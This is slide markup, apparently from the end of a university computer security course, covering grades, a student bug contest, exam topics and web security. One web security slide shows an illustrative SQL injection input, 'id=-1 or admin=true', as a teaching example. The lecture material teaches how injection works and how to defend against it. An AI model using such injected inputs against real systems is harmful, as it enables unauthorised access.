          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="1353791"/>
            <a:ext cx="1143000" cy="2108044"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="990600" y="1524000"/>
            <a:ext cx="1143000" cy="2362200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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26717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841909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Homework 3 Graded</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371601"/>
            <a:ext cx="8229600" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Average Score: 97</a:t>
            </a:r>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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">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340880651"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1295400" y="2079174"/>
          <a:ext cx="6553200" cy="4435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349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Coolest Bug Contest Winners</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" fontAlgn="b">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>1st: Tom Chittenden, Terence An</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	(Session Hijacking on “Eat Street”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>2nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Charles Chong, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Matthew </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Sebek</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vBulletin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Vulnerability)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>3rd: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Utkarsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Sanghi, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Advaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Krishna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	(Issues with Switching Users in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RedHat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Kathy Yu 	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> with Gmail on IOS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27373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 3</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4131529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3 Mechanics</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Same format as exams 1 and 2. In class, closed note, closed book, closed computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>BRING A CALCULATOR (no cell phones, PDA’s, computers, etc.) Think of this as a hint.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Topics: Anything from class</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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257631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message from David</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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1219200"/>
            <a:ext cx="8534400" cy="5601534"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>I very much enjoyed this class.  You all were wonderful. There was a lot of hard  work.  I think what I like the most, though, is people spent time actually thinking.  Kudos to all of you. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>I also hope you learned something, and that the homework sets were interesting. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Unfortunately, I got called to DC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> Sometimes you</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>can’t choose these things.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>... but I spent thanksgiving making up the last exam, and the TAs will go over everything you need to know.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="705508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Important Things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Anything is fair game, but the below are things you absolutely must know</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Base Rate Fallacy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Authenticated encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stack diagrams/buffer overflow/etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Questions from exam 1 and exam 2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(study what you missed)</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424379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Web Security</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995191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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection flaws </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>occur when an application sends untrusted data to an interpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>--- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="6492875"/>
            <a:ext cx="7021862" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/Top_10_2010-A4-Insecure_Direct_Object_References</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1066800" y="2811572"/>
            <a:ext cx="6779172" cy="2979627"/>
            <a:chOff x="1066800" y="2811572"/>
            <a:chExt cx="6779172" cy="2979627"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Bent-Up Arrow 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1066800" y="2811572"/>
              <a:ext cx="2133600" cy="2133600"/>
            </a:xfrm>
            <a:prstGeom prst="bentUpArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 19581"/>
                <a:gd name="adj2" fmla="val 25000"/>
                <a:gd name="adj3" fmla="val 25000"/>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7" name="Rounded Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2969172" y="3581400"/>
              <a:ext cx="4876800" cy="2209799"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>L</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>ike Buffer Overflow and Format String Vulnerabilities, A result of from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mixing data and code</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35742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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6504189" y="1418949"/>
            <a:ext cx="1600200" cy="2304288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7260021" y="5029200"/>
            <a:ext cx="911250" cy="1260000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1941128"/>
            <a:ext cx="2182611" cy="1270475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3162300" y="2209800"/>
            <a:ext cx="28194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086600" y="3810000"/>
            <a:ext cx="372595" cy="11430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7715646" y="3429000"/>
            <a:ext cx="209154" cy="15240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162300" y="2576365"/>
            <a:ext cx="28194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81400" y="1806309"/>
            <a:ext cx="1689758" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>user.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3565998" y="4234146"/>
            <a:ext cx="3543919" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT FROM users where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=5 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7833361" y="3774173"/>
            <a:ext cx="1082027" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“jburket”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3928009" y="2631180"/>
            <a:ext cx="1082027" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“jburket”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3216275" y="1606667"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3140075" y="4241947"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8234557" y="333245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smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3478013" y="267356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smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 23"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:duotone>
              <a:schemeClr val="accent1">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1824256" y="2926933"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1711557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Injection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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6504189" y="1418949"/>
            <a:ext cx="1600200" cy="2304288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7260021" y="5029200"/>
            <a:ext cx="911250" cy="1260000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1941128"/>
            <a:ext cx="2182611" cy="1270475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3162300" y="2209800"/>
            <a:ext cx="28194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086600" y="3810000"/>
            <a:ext cx="372595" cy="11430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7715646" y="3429000"/>
            <a:ext cx="209154" cy="152400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162300" y="2576365"/>
            <a:ext cx="28194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68709" y="1806309"/>
            <a:ext cx="3380926" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>user.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>-1 or admin=true</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2142085" y="4427674"/>
            <a:ext cx="5235087" cy="369332"/>
          </a:xfrm>
